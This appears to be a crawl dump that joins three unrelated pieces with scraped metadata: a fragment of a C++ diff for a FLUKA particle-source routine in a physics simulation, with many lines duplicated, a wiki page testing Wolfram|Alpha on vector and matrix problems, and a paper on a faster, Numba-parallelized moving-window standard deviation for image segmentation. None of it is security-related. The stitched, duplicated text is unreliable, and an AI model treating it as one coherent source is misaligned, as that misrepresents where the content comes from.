particle->Py()/particle->P();\nDouble_t cosz = TMath::Sqrt(oneone - cosx*cosx - cosy*cosy);\n@@ -201,30 +222,23 @@ extern \"C\" {\nSTACK.ty [STACK.lstack] = cosy;\nSTACK.tz [STACK.lstack] = cosz;\n\nSTACK.ty [STACK.lstack] = cosy;\nSTACK.tz [STACK.lstack] = cosz;\n\n-    /* Polarization cosines:\n-     */\n-    //STACK.txpol [STACK.lstack] = -twotwo;\n-    //STACK.typol [STACK.lstack] = +zerzer;\n-    //STACK.tzpol [STACK.lstack] = +zerzer;\n+    /* Polarization cosines:*/\nif (polarisation.Mag()) {\nif (polarisation.Mag()) {\n-      Double_t cospolx = polarisation.Px()/polarisation.Mag();\n-      Double_t cospoly = polarisation.Py()/polarisation.Mag();\n-      Double_t cospolz = sqrt(oneone - cospolx*cospolx - cospoly*cospoly);\n-      STACK.tx [STACK.lstack] = cospolx;\n-      STACK.ty [STACK.lstack] = cospoly;\n-      STACK.tz [STACK.lstack] = cospolz;\n+       Double_t cospolx = polarisation.Px()/polarisation.Mag();\n+       Double_t cospoly = polarisation.Py()/polarisation.Mag();\n+       Double_t cospolz = sqrt(oneone - cospolx*cospolx - cospoly*cospoly);\n+       STACK.tx [STACK.lstack] = cospolx;\n+       STACK.ty [STACK.lstack] = cospoly;\n+       STACK.tz [STACK.lstack] = cospolz;\n}\nelse {\n}\nelse {\n-      STACK.txpol [STACK.lstack] = -twotwo;\n-      STACK.typol [STACK.lstack] = +zerzer;\n-      STACK.tzpol [STACK.lstack] = +zerzer;\n+       STACK.txpol [STACK.lstack] = -twotwo;\n+       STACK.typol [STACK.lstack] = +zerzer;\n+       STACK.tzpol [STACK.lstack] = +zerzer;\n}\n\n/* Particle coordinates*/\n}\n\n/* Particle coordinates*/\n-    //STACK.xa [STACK.lstack] = BEAM.xina;\n-    //STACK.ya [STACK.lstack] = BEAM.yina;\n-    //STACK.za [STACK.lstack] = BEAM.zina\n-      //Vertext coordinates;\n+    // Vertext coordinates;\nSTACK.xa [STACK.lstack] = particle->Vx();\nSTACK.ya [STACK.lstack] = particle->Vy();\nSTACK.za [STACK.lstack] = particle->Vz();\nSTACK.xa [STACK.lstack] = particle->Vx();\nSTACK.ya [STACK.lstack] = particle->Vy();\nSTACK.za [STACK.lstack] = particle->Vz();\n@@ -232,11 +246,11 @@ extern \"C\" {\n/*  Calculate the total kinetic energy of the primaries: don't change*/\nInt_t st_ilo =  STACK.ilo[STACK.lstack];\nif ( st_ilo != 0 )\n/*  Calculate the total kinetic energy of the primaries: don't change*/\nInt_t st_ilo =  STACK.ilo[STACK.lstack];\nif ( st_ilo != 0 )\n-      EPISOR.tkesum +=\n-       ((STACK.tke[STACK.lstack] + PAPROP.amdisc[st_ilo+6])\n-        * STACK.wt[STACK.lstack]);\n+       EPISOR.tkesum +=\n+           ((STACK.tke[STACK.lstack] + PAPROP.amdisc[st_ilo+6])\n+            * STACK.wt[STACK.lstack]);\nelse\nelse\n-      EPISOR.tkesum += (STACK.tke[STACK.lstack] * STACK.wt[STACK.lstack]);\n+       EPISOR.tkesum += (STACK.tke[STACK.lstack] * STACK.wt[STACK.lstack]);\n\n/*  Here we ask for the region number of the hitting point.\n*     NREG (LSTACK) = ...\n\n/*  Here we ask for the region number of the hitting point.\n*     NREG (LSTACK) = ...\n@@ -246,21 +260,30 @@ extern \"C\" {\ngeocrs( STACK.tx[STACK.lstack],\nSTACK.ty[STACK.lstack],\nSTACK.tz[STACK.lstack] );\ngeocrs( STACK.tx[STACK.lstack],\nSTACK.ty[STACK.lstack],\nSTACK.tz[STACK.lstack] );\n+\nInt_t idisc;\nInt_t idisc;\n+\ngeoreg ( STACK.xa[STACK.lstack],\nSTACK.ya[STACK.lstack],\nSTACK.za[STACK.lstack],\nSTACK.nreg[STACK.lstack],\nidisc);//<-- dummy return variable not used\ngeoreg ( STACK.xa[STACK.lstack],\nSTACK.ya[STACK.lstack],\nSTACK.za[STACK.lstack],\nSTACK.nreg[STACK.lstack],\nidisc);//<-- dummy return variable not used\n-\n/*  Do not change these cards:*/\nInt_t igeohsm1 = 
1;\nInt_t igeohsm2 = -11;\ngeohsm ( STACK.nhspnt[STACK.lstack], igeohsm1, igeohsm2, LTCLCM.mlattc );\nSTACK.nlattc[STACK.lstack] = LTCLCM.mlattc;\nsoevsv();\n/*  Do not change these cards:*/\nInt_t igeohsm1 = 1;\nInt_t igeohsm2 = -11;\ngeohsm ( STACK.nhspnt[STACK.lstack], igeohsm1, igeohsm2, LTCLCM.mlattc );\nSTACK.nlattc[STACK.lstack] = LTCLCM.mlattc;\nsoevsv();\n-    TVirtualMCApplication::Instance()->BeginPrimary();\n-    TVirtualMCApplication::Instance()->PreTrack();\n+//\n+//  Pre-track actions at for primary tracks\n+//\n+    if (particleIsPrimary) {\n+       TVirtualMCApplication::Instance()->BeginPrimary();\n+       TVirtualMCApplication::Instance()->PreTrack();\n+    }\n+\n+//\n+\n#ifdef METHODDEBUG\ncout << \"<== source(\" << nomore << \")\" << endl;\n#endif\n#ifdef METHODDEBUG\ncout << \"<== source(\" << nomore << \")\" << endl;\n#endif" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5190246,"math_prob":0.89409715,"size":741,"snap":"2022-40-2023-06","text_gpt3_token_len":215,"char_repetition_ratio":0.18860245,"word_repetition_ratio":0.0,"special_character_ratio":0.31578946,"punctuation_ratio":0.24,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9958976,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-24T19:19:47Z\",\"WARC-Record-ID\":\"<urn:uuid:d6d03a52-cf2e-4bbb-bf6c-5db646117fbc>\",\"Content-Length\":\"59116\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:409da7f0-6a6a-4521-8680-3cce5cfdf519>\",\"WARC-Concurrent-To\":\"<urn:uuid:4c5cd47a-b607-43f5-91fe-f54b568c2ff4>\",\"WARC-IP-Address\":\"129.240.118.59\",\"WARC-Target-URI\":\"http://git.uio.no/git/?p=u/mrichter/AliRoot.git;a=blobdiff;f=TFluka/source.cxx;h=7720669332a4c84966d8a3a3119e91108ea686ed;hp=ccb3dc73f6e6f165531c3ee9c7701143ee57cf5a;hb=ce60a1360da75d567bf1e946e5d24c7a5eb668e2;hpb=f55b9162da6c2a42c51854272ad118ea8ca81f1c;ds=sidebyside\",\"WARC-Payload-Digest\":\"sha1:TU754B7CWY7JUGLUKOLCVL6FSVKVNLNK\",\"WARC-Block-Digest\":\"sha1:ILNXW767K6XLLG4QP3PO5MLDGAVN5FPV\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030333455.97_warc_CC-MAIN-20220924182740-20220924212740-00502.warc.gz\"}"}
http://walphawiki.wikidot.com/linear-algebra
[ "Linear Algebra\n\nLet's see how Wolfram|Alpha can handle or help handle typical problems in a linear algebra course.\n\n# Vectors\n\nW|A Query: {2, -5, 4}\n\nResult: Wolfram|Alpha sums the entries in the vector (to get 1), finds the average of the components of the vector (1/3 in this case), computes the length of the vector (about 6.7, given as a decimal approximation and an exact number involving a square root), and normalizes the vector.\n\nImplications: Having a tool to quickly determine the length of a vector or normalize it should be handy for students, particularly in solving complex problems that require many such calculations. It's worth noting that there are no \"Show Steps\" options for these computations, so they don't show students how to perform these computations, for better or for worse.\n\nAs usual, Wolfram|Alpha provides more information than is requested. In this case, seeing the length of a vector along with its normalization might help some students see that there is a connection between these two computations, even if Wolfram|Alpha's results don't really shed any light on what that connection is.\n\n# Matrices\n\nW|A Query: {{2,0},{1,3}}\n\nResult: Wolfram|Alpha provides lots of information about a matrix: its determinant, its trace, its eigenvalues and corresponding eigenvectors, its condition number, and its inverse. Perhaps surprisingly, W|A doesn't provide an echelon form of the matrix. All of the results provided, however, can be expressed in approximate or exact form. No \"Show Steps\" options are provided, however.\n\nW|A also specifies the dimensions of the matrix (which could come in handy if it has been cut-and-pasted from another application) and provides a \"matrix plot\" in which the values of the matrix entries are represented by colors. See below.", null, "Implications: Again, W|A serves as a handy computational aid, but doesn't shed much light on the associated concepts—or even the calculations themselves, given the lack of \"Show Steps.\" Seeing all these computations at once isn't likely to help students who don't already know the connections among them.\n\n## Row Reduce a Matrix\n\nW|A Query: rref[{{2,0},{1,3}}]\n\nResult: Wolfram|Alpha provides the reduced row echelon form of the matrix, which in this case is the identity matrix. There is no \"Show Steps\" option, and no additional information is provided. Note that W|A provides the result in list form, not in matrix notation. To see the result in matrix notation, use the following command: matrixform[rref[ {{0,1,4,-5},{1,3,5,-2},{3,7,7,6}}] ]\n\nLimitations: Wolfram|Alpha appears to have an input limit of 200 characters. This limits the usefulness of Wolfram|Alpha in row-reducing large matrices and matrices with real-world data (which often has several significant figures). For instance, the following command maxes out Wolfram|Alpha's input limit:\n\nThe matrix involved isn't very large, only 5 x 6:\n\n(1)\n\\begin{align} \\left [ \\begin{matrix} -0.5893 & 0.0352 & 0.05 & 0.0587 & 0.1093 & 0\\\\ .0582 & -.5882 & .1241 & .0922 & .2674 & 0\\\\ .0665 & .1532 & -.799 & .3151 & .4856 & 0\\\\ .0742 & .1021 & .0773 & -.711 & .1289 & 0\\\\ .3904 & .2977 & .5476 & .2451 & -.9912 & 0 \\end{matrix} \\right ] \\end{align}\n\nHowever, the entries have several digits each (for the most part), resulting in the command hitting Wolfram|Alpha's limit.\n\nWolfram|Alpha apparently has a size limit, too. 
For example, Wolfram|Alpha can't handle the following command:\n\nThe matrix involved, however, is only 5 x 8:\n\n(2)\n\\begin{align} \\left [ \\begin{matrix} 1 & 0 & 1 & 0 & 0 & 0 & 0 & 800\\\\ 0 & 0 & 1 & 0 & 0 & 1 & 0 & 750\\\\ 0 & -1 & 1 & 0 & 0 & 1 & 0 & 200\\\\ 1 & -1 & 0 & 1 & 0 & 0 & 0 & 200\\\\ 0 & 0 & 0 & 1 & 0 & 1 & -1 & 600 \\end{matrix} \\right ] \\end{align}\n\nOmitting one of the rows to produce a 4 x 8 matrix works fine, however.\n\n## Matrix-Vector Multiplication\n\nExample: Multiply the matrix\n\n(3)\n\\begin{align} \\left [ \\begin{matrix} .5 & .4 & .6\\\\ .2 & .2 & .3\\\\ .3 & .4 & .1 \\end{matrix} \\right ] \\end{align}\n\nby the vector\n\n(4)\n\\begin{align} \\left [ \\begin{matrix} 500\\\\200\\\\300 \\end{matrix} \\right ]. \\end{align}\n\nResults: Wolfram|Alpha performs the operation as expected, yielding the result {510, 230, 260}. Also provided are the sum and average of the components of this vector, as well as its length, normalization, and spherical coordinates. This is consistent with how Wolfram|Alpha treats vectors.\n\nFor some reason (perhaps because the matrix involved is stochastic), Wolfram|Alpha also converts the result into a pie chart:", null, "# Linear Systems\n\n## Solve a Matrix Equation\n\nW|A Query: solve {{2,0},{1,3}}.{x1,x2}={3,5}\n\nResults: Wolfram|Alpha provides the solution to this simple matrix equation,\n\n(5)\n\\begin{align} x_1 = \\frac{3}{2}, x_2 = \\frac{7}{6}. \\end{align}\n\nThere is no \"Show Steps\" option, and no additional information is provided." ]
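For readers who want to check the numbers quoted on this page without querying Wolfram|Alpha, a minimal NumPy sketch (NumPy is an assumption here; the wiki itself only issues W|A queries) reproduces the determinant, trace, eigenvalues, inverse, matrix-vector product, and linear solve discussed above:

```python
# Local verification of the Wolfram|Alpha results quoted above (NumPy is an
# assumption; the original wiki page only issues W|A queries).
import numpy as np

A = np.array([[2.0, 0.0],
              [1.0, 3.0]])
print(np.linalg.det(A))        # 6.0, the determinant
print(np.trace(A))             # 5.0, the trace
print(np.linalg.eigvals(A))    # eigenvalues 2 and 3 (order may vary)
print(np.linalg.inv(A))        # inverse, approximately [[0.5, 0], [-0.1667, 0.3333]]

# Matrix-vector multiplication from equations (3)-(4); expected {510, 230, 260}.
M = np.array([[0.5, 0.4, 0.6],
              [0.2, 0.2, 0.3],
              [0.3, 0.4, 0.1]])
v = np.array([500.0, 200.0, 300.0])
print(M @ v)                   # [510. 230. 260.]

# Solve {{2,0},{1,3}}.{x1,x2} = {3,5}; expected x1 = 3/2, x2 = 7/6, as in (5).
b = np.array([3.0, 5.0])
print(np.linalg.solve(A, b))   # approximately [1.5, 1.1667]
```

SymPy's Matrix.rref() can likewise stand in for the rref query when an offline reduced row echelon form is needed, though that is a separate dependency.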
[ null, "http://walphawiki.wikidot.com/local--files/linear-algebra/matrixplot.jpg", null, "http://walphawiki.wikidot.com/local--files/linear-algebra/wapiechart.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90940064,"math_prob":0.98556054,"size":4329,"snap":"2022-05-2022-21","text_gpt3_token_len":1147,"char_repetition_ratio":0.14289017,"word_repetition_ratio":0.029950082,"special_character_ratio":0.28644028,"punctuation_ratio":0.2324873,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9908066,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-16T15:46:17Z\",\"WARC-Record-ID\":\"<urn:uuid:d6f3ef8d-0c2b-47d3-933e-6e512766dc75>\",\"Content-Length\":\"36148\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6c5a86fa-974b-4243-a6a8-5cbb52d1b514>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac603b17-eccc-4d4e-aac0-5307885b286a>\",\"WARC-IP-Address\":\"107.20.139.176\",\"WARC-Target-URI\":\"http://walphawiki.wikidot.com/linear-algebra\",\"WARC-Payload-Digest\":\"sha1:5GF5ZB43H7W3HNPSHZERYBZJX4VURFPU\",\"WARC-Block-Digest\":\"sha1:NCJ2H7BJQSMPJUS22IOV6OMYGRZRXXYT\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662510138.6_warc_CC-MAIN-20220516140911-20220516170911-00361.warc.gz\"}"}
https://crypto.stackexchange.com/questions/25145/verification-of-pinocchio-verifiable-computation
[ "# Verification of Pinocchio (verifiable computation)\n\nI am reading the Pinocchio paper. The calculated result $y$ is part of the verification input, but it seems to me that the verification procedure does not utilize the result $y$. Can anyone help me to understand this?\n\n• You should probably add a link to the paper and make it easier for readers to find this $y$ and the verification procedure in the paper. – K.G. Apr 22 '15 at 7:45\n\n$y$ is the values of the output wires, so it is used to compute $g_v^{v_{io}(s)}$, $g_w^{w_{io}(s)}$, and $g_y^{y_{io}(s)}$. (Remember that $c_k$ is the value of the wire with index $k$.)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87087405,"math_prob":0.9824409,"size":598,"snap":"2020-34-2020-40","text_gpt3_token_len":172,"char_repetition_ratio":0.12794612,"word_repetition_ratio":0.0,"special_character_ratio":0.3043478,"punctuation_ratio":0.109375,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99909234,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-12T00:41:57Z\",\"WARC-Record-ID\":\"<urn:uuid:7b04ba29-8abc-4dd7-a71d-116b90a6e48d>\",\"Content-Length\":\"144972\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:93a7e9db-5192-47ee-9044-af730dcaaac5>\",\"WARC-Concurrent-To\":\"<urn:uuid:ee4169e7-f477-4465-8ee7-2f68a3fd9074>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/25145/verification-of-pinocchio-verifiable-computation\",\"WARC-Payload-Digest\":\"sha1:WOE6OJCEP4YSO4WC4JXBIHZBDOVTKWD6\",\"WARC-Block-Digest\":\"sha1:GAQVT5USYSU4GRIBBUTSZJXVPXCQPMV2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439738858.45_warc_CC-MAIN-20200811235207-20200812025207-00034.warc.gz\"}"}
https://scirp.org/journal/paperinformation.aspx?paperid=101849
[ "Development and Parallelization of an Improved 2D Moving Window Standard Deviation Python Routine for Image Segmentation Purposes\n\nAbstract\n\nTwo additional features are particularly useful in pixelwise satellite data segmentation using neural networks: one results from local window averaging around each pixel (MWA) and another uses a standard deviation estimator (MWSD) instead of the average. While the former’s complexity has already been solved to a satisfying minimum, the latter has not. This article proposes a new algorithm that can substitute a naive MWSD, making the complexity of the computational process fall from O(N²n²) to O(N²n), where N is the side of a square input array and n is the moving window’s side length. The Numba Python compiler was used to make Python a competitive high-performance computing language in our optimizations. Our results show efficiency benchmarks.\n\nShare and Cite:\n\nConceição, M., Mendonça, L. and Lentini, C. (2020) Development and Parallelization of an Improved 2D Moving Window Standard Deviation Python Routine for Image Segmentation Purposes. Computational Water, Energy, and Environmental Engineering, 9, 75-85. doi: 10.4236/cweee.2020.93006.\n\n1. Introduction\n\nImage segmentation consists of partitioning image pixels into a set of regional categories. This process can be significantly improved by using two additional images (image features) based on two fundamental statistical concepts, if they are also input to neural networks, a technique that creates a fertile field for segmentation solutions. These image features can be seen in Figure 1 and are described as follows:\n\n1) n × n moving window average (MWA): classical MWA, where the value of the central pixel in the array is replaced by its n × n window average; and\n\n2) n × n moving window standard deviation (MWSD): similar to the MWA, but the value of the central pixel is replaced by the standard deviation of the moving array.\n\nLocal window functions are not restricted to image segmentation: they are routinely used for suppressing noise in filter operations. That aside, their usage in segmentation is well established in the literature.\n\nThe first image attribute (MWA) is calculated by convolving the original image with a specific kernel, which is a matrix filled with 1/n². Furthermore, these convolutions can be calculated in a faster way via products in a frequency domain. Likewise, this process can get even faster by integrating a method called “overlap-and-add”. In this case, if the inputs are N × N arrays, the computational time is given by O(N² log₂ n), which is much less than a naïve convolution algorithm's: O(N²n²).\n\nAny process that can be written in convolutional terms (as MWA) can be implemented in such a way as to get these benefits. However, the MWSD has a restriction, since the standard deviation is not a linear operation itself, and it has the same computational complexity as a naïve convolution algorithm (O(N²n²)).\n\nAs the square dependency with N cannot be solved in any of the mentioned algorithms, the important variable to pay attention to here is n: the moving window side length.\n\nChoosing useful n × n kernel dimensions for a specific process is usually a heuristic trial-and-error process, and depends on the data properties, especially spatial resolution and noise signature. The growth of SAR spatial resolution in the last decades comes with the downside of bigger image dimensions. In the same proportion, the kernel window size search space is increased. 
As an example, a 3 × 3 MWA applied over old ENVISAT ASAR sensor data would get similar results, in spatial terms, to applying a 45 × 45 MWA over new Sentinel-1 data, while in this last case the equivalent computation would be 225 times slower.\n\nTherefore, the core of this article is to propose a new methodology using an algorithm that replaces the usual 2D MWSD, in order to decrease its computational complexity, as there are no other works dealing with this problem and a researcher needs freedom to study various kernel sizes in a timely manner in order to find the one that best fits his models. The idea behind it is saving some of the calculations done at the first pixel of a row to the next one and so on, after an optimized analytical reformulation of the standard deviation calculation is performed. Additionally, our algorithms were designed to be used in the context of CPU parallelism, taking advantage of it for a faster runtime.\n\nFigure 1. Original Sentinel-1 image and two image features.\n\nFollowing strong open source global trends, and seeking to benefit the maximum number of users, our code was written in Python, as this language is commonly used in the context of machine learning, and it is available online in a public GitHub repository.\n\nPython is developed to be a high-level, interpreted language and, as a consequence, is generally slower than C or Fortran at runtime, but this problem is already addressed by free packages that allow Python compilation and lower-level optimization of code.\n\nThe Numba package is an example. Described as “a high-performance Python compiler”, Numba is a Python library meant to compile Python functions (even though Python is an interpreted language by default). By doing this, the compiled functions gain C-like speed, being generally compatible with NumPy—a widely used linear algebra package for Python.\n\nThis work was developed as part of a set of digital image processing routines, meant to be an improved tool for automatic classifiers already used in remote sensing studies. It compares the performance of the usual 2D MWSD algorithm and ours, before and after being compiled with Numba.\n\n2. Methodology\n\nFirst, the methodological process was developed with three test algorithms: 1) a “didactic” MWSD, 2) a “better” MWSD and 3) an “optimized” MWSD. These algorithms are introduced and discussed below for a 1D matrix and a 1D window. After this first theoretical assessment stage, the first and last algorithms were extended to the second dimension (2D input array and 2D window). They were programmed and tested both theoretically and practically, before and after being compiled, so that we can compare them in terms of computational efficiency.\n\n2.1. Didactic Algorithm\n\nFor didactic purposes, the standard deviation of a series of observations is defined in terms of its variance—an average over all squared differences between the observations and their average value—as in Equation (1):\n\n$\sigma =\sqrt{\frac{\sum_{i=0}^{n_e}{\left(x_{i}-\bar{x}\right)}^{2}}{n_e}}$ , (1)\n\nwhere σ is the standard deviation of the $n_e$ elements $x_i$, and $\bar{x}$ is their mean value. The standard deviation of a dataset serves as a measure of how dispersed its elements are. 
As $\\stackrel{¯}{x}$ is part of the calculation, this process takes a total of 4ne + 1 operations.\n\nThe denominator ne is sometimes exchanged with ne − 1, what is called Bessel’s correction and is useful to remove part of standard deviation estimator bias when ne is small. We are not going to use Bessels correction in this article, as it is not relevant for image segmentation.\n\nFrom a generic 1D array of N elements, it’s possible to create another of similar shape, so that each element i therein is the standard deviation of 3 adjacent values in the original array, making a window centered at the ith position. When one of the values does not exist in these windows, we make it zero for the sake of calculation. This array is the result of a one-dimensional MWSD over the original array.\n\nThis process is equivalent to pad the older array with zeros, then slide a window of size, n = 3, through that array, method already proposed in the literature . Every time the window is updated, a standard deviation is calculated, and the result stacked in the new array. This process takes then 13N operations, or in a more general case, for any window size n, N(4n + 1).\n\nThis method is effective. However, in many cases, it has an extense processing time. There are many faster ways to calculate MWSD, and an example is shown in next section.\n\n2.2. Better Algorithm\n\nIn order to develop a more efficient algorithm, simple manipulation of Equation (1) can lead to Equation (2):\n\n$\\sigma =\\sqrt{\\frac{\\underset{i=0}{\\overset{{n}_{e}}{\\sum }}{x}_{i}^{2}}{{n}_{e}}-{\\left[\\frac{\\underset{i=0}{\\overset{{n}_{e}}{\\sum }}{x}_{i}}{{n}_{e}}\\right]}^{2}}$ (2)\n\nWith no more tricks, this formula makes computing the standard deviation of an array of n e elements much faster: only 3ne + 3 operations are needed, as one only loop must be used. Also, thinking about the problem just exposed in last section about 1D MWSD calculation, we would only make N(3n + 3) operations to get the same task done. In other words, when the window size, n, gets big, approximately 1/4 less operations are made. It’s important to observe that efficiency and intelligibility do not go hand in hand: Equation (2) would not be a good introduction formula to standard deviation.\n\n2.3. Optimized Algorithm\n\nTaking 1D MWSD is a problem that gets simplified if one takes a careful look on how variables are used in Equation (2). Note that if summations are not calculated from scratch at each array element, but instead just updated when the window moves, a python pseudo-code like “optimized_mwsd_1D” (in Code 1) would be gotten.", null, "Code 1. Optimized 1D MWSD.\n\nAnd here is the advantage: what we had previously gotten with N(3n + 3) operations now costs only 11N + 3n − 7 operations. When the array side (N) is sufficiently big, the task complexity does not depend on the chosen window side, n. As this number is usually an odd number greater or equal to 3—as the window used is centered at a certain position, from the stated problem, it is right to say that our new algorithm always performs faster than our previous one.\n\n2.4. 2D Extension\n\nWhen working with 2D input data arrays of N lines and M columns, it might be useful to extend the concept of a moving window standard deviation algorithm, in a way that a window represents a 2D array, and it will move through all the array points, being once centered at each one of them. 
In this way, n could now be a measure of the side of the window used.\n\nMaking such alterations to the didactic algorithm explained in Section 2.1 would give us a simple algorithm that needs NM(4n² + 1) operations to be run. It means that the computational time used for making these calculations would depend strongly on the window size used. As N and M are usually big numbers in satellite remote sensing applications, this formula might be a problem.\n\nAs the optimized algorithm makes the MWSD cost almost independent of n when N is sufficiently big, we tried to apply the same logic to the new 2D case. What is essential about this code is that the algorithm behind it does exactly what our previous one did, but only makes use of N(M(6n + 5) + 3n² − 6n − 2) + 1 operations: most of the calculation is done by just updating (in the 6NMn term).\n\nThese numbers may be easily understood if we assume M ≈ N $\gg$ n ≥ 3. In such a case, the exposed formulas can be approximated to 4N²n² and 6N²n, respectively. The latter algorithm performs faster than the first, even in the limit case, when n = 3. Another great advantage of this 2D algorithm is that, as it is basically running the extended 1D algorithm at each row, we can then parallelize loops over every column, as they only depend on previous operations therein.\n\nThere are many methods to parallelize Python code, for example: using Numba, Cython, and mpi4py. As Python's strength is that it achieves big results with little typing effort, Numba was chosen. It can frequently get almost perfect results by just changing a couple of lines of code.\n\nWhile Python is usually slow for calculations because it is an interpreted language, Numba is a Python library able to compile its code, so that it runs at C-like speed.\n\nGetting started with Numba is a simple task. Compiling code with parallel support usually means importing the library and adding a decorator (a statement starting with @) one line before a Python function. An example is shown in Code 2.\n\nThis decorator is a “just in time” compiler. It means it compiles the code when the function is first called. Although the parallel argument is set to True, it just means that parallel support is enabled at compilation time. To actually make use of parallelization in our code we would need to go to the columns' loop of our algorithm and, instead of writing a regular range, use numba.prange for a parallel range iterator.\n\nThere is just one more thing to be done: we previously used a function to pad the input array, “np.pad”. This function comes from the NumPy library and has no compatibility with Numba. A simple function was developed to pad an array with zeros in order to finish the compilation process. There is a list of NumPy supported features in Numba's official documentation, and it might be useful when debugging compilation.\n\n3. Results and Discussion\n\nThe algorithms developed for preparing the results below are publicly available online at github.com/marcosrdac/mwsd. Theoretical efficiency results for 1D and 2D MWSD problems can be seen in Figure 2. Algorithms' complexities are described in Table 1. Real results can be seen in Figure 3. Each point was calculated five times, and error bars were plotted using the standard deviation (with Bessel's correction) as the dispersion estimator.", null, "Code 2. @numba.jit decorator usage.\n\nTable 1. Algorithms and their complexities.\n\nFigure 2. Theoretical performance (in operations) vs. 
n plot for 1D and 2D algorithms (indicated by different line styles) and different values of N (indicated by different line colors).\n\nFigure 3. Real performance (in time) vs. n plot for 2D algorithms (indicated by different line styles) and different values of N (indicated by different line colors).\n\nIt is useful to know that an MWSD algorithm made with NumPy's “std” function (the standard way a Python user would calculate a standard deviation) behaved just like the “didactic” algorithm in terms of computational time.\n\nOur results were plotted in log-log plots, so that the reader can explore how the number of operations scales with respect to n, in orders of magnitude. Different line colors mean curves made with different values of the array side, N. On the other hand, the different line styles distinguish curves by the algorithm used. The established conventions for colors were:\n\n· Red line: N = 100;\n\n· Green line: N = 200;\n\n· Orange line: N = 300; and\n\n· Blue line: N = 400.\n\nAlso, these were the line style conventions:\n\n· Dotted line: curve calculated using the didactic MWSD;\n\n· Dashed line: curve calculated using the better MWSD; and\n\n· Continuous line: curve calculated using the optimized MWSD.\n\nThe 1D optimized algorithm's theoretical performance can be seen as the continuous lines in the first plot of Figure 2, and is visually almost independent from n, as expected. For n = 29, it does the same job as the usual didactic 1D MWSD in an amount of time one order of magnitude below (compare continuous and dotted lines of the same colors).\n\nThe theoretical results get yet more interesting when talking about 2D algorithms (second plot of Figure 2). Our new algorithm is indeed faster than the usual 2D MWSD, while delivering the same accuracy. For a window with a 19-pixel side, these algorithms' performance differs by one order of magnitude in time, and by almost two orders when the window size gets to 59. Also, it's important to know that, for greater values of N (or bigger array sizes), this difference gets even higher.\n\nReal tests were only made for the 2D algorithms, as they are the ones useful for image segmentation. Their results were plotted in Figure 3. The first plot is pure Python/NumPy code and could only be calculated for a small range of n's: 3, 5, 7 and 9, as the runs were too time consuming. The time magnitude order is in seconds, and this happens because non-compiled Python loops are highly inefficient. Although the spent times do scale with n, this variation is not big enough when compared to the intrinsic slowness of Python in the case of small window and array sides. Our results show that the proposed algorithm (continuous line) consumes less computation time than the didactic MWSD even before compilation.\n\nSome important effects are heavily seen in the bottom plot of Figure 3. The fundamental reason for them is that most of the data stands near the end of the plot, as a consequence of the log-log plotting choice. It means that the curve trend must be visually estimated from there. Moreover, it's known from basic calculus that polynomial curves are dominated by their term of highest exponent; the other terms' effect is not important when the abscissa gets big. In a log-log plot, different exponent terms are viewed as different line slopes. Based on that, the bottom plot of Figure 3 is remarkably similar to the expected plot on the right of Figure 2: the ending slopes of all curves are both visually and numerically tending to equality when n increases. 
It means that both the didactic and the optimized MWSD algorithms have the computational complexity that was expected in theory.\n\nThe difference between the behavior of these two plots is more visible at the first three points of the curves (n ≤ 9), and is completely understandable: the theoretical formulas only account for the MWSD itself, not for the previous process of padding the input array (which only exists to ensure input and output arrays are of the same size) and allocating memory for the output. This consumes significant time for small values of n and can be seen as a different, smaller slope at the beginning of the second plot of Figure 3. Besides this effect, its resemblance to the second plot of Figure 2 is clear and validates this article. We emphasize here the computational time of the compiled algorithms: its magnitude is in ms.\n\nThis technique is very useful in satellite remote sensing studies, as it can estimate textural characteristics of an image, being convenient for robust methods of segmentation, such as neural networks. As an example, oil slicks are easily seen in RADAR images. In numbers, “Interferometric Wide Single Look Complex” images are arrays of enormous dimensions, such as 13,169 × 17,241 px². Applying this process to an 8192 × 8192 px² subset using a didactic algorithm and n = 5 took 25 minutes to complete using four cores of an Intel i9 processor. After Numba compilation, this processing time went down to 11 seconds. Using our method we only needed 0.7 seconds to perform the same job. Therefore, if five images need to be processed by an MWSD algorithm, our method would run in 45 seconds instead of the 12 minutes of the didactic algorithm, or 28 hours with the same algorithm without the Numba compilation.\n\n4. Conclusions\n\nIn this paper, we demonstrated that moving window standard deviation functions can have their efficiency improved with two simple steps: 1) a useful reformulation of the analytic formula, at the cost of losing a certain amount of intuitive intelligibility, and 2) reusing previous calculations in future iterations.\n\nOur “optimized” (both 1D and 2D) code ran significantly faster than a naïve, completely “didactic” one, or even another that would be made using default NumPy functions. Pure Python is indeed very slow when evaluating loops and numerical results, as could be seen in our results, but this was solved by using Numba, with compilation and parallelization of the code.\n\nImage segmentation is useful in many areas but is core knowledge when it comes to environmental control. Defining areas of significant atmospheric pollution, urban occupation levels, geologic faults, and ocean phenomena are key examples of its uses. The proposed improvement is especially useful when working with satellite data, where images form arrays of large dimensions, and even auxiliary processes can frequently take a considerable amount of time.\n\nSince our algorithm has a linear time dependency on the window side 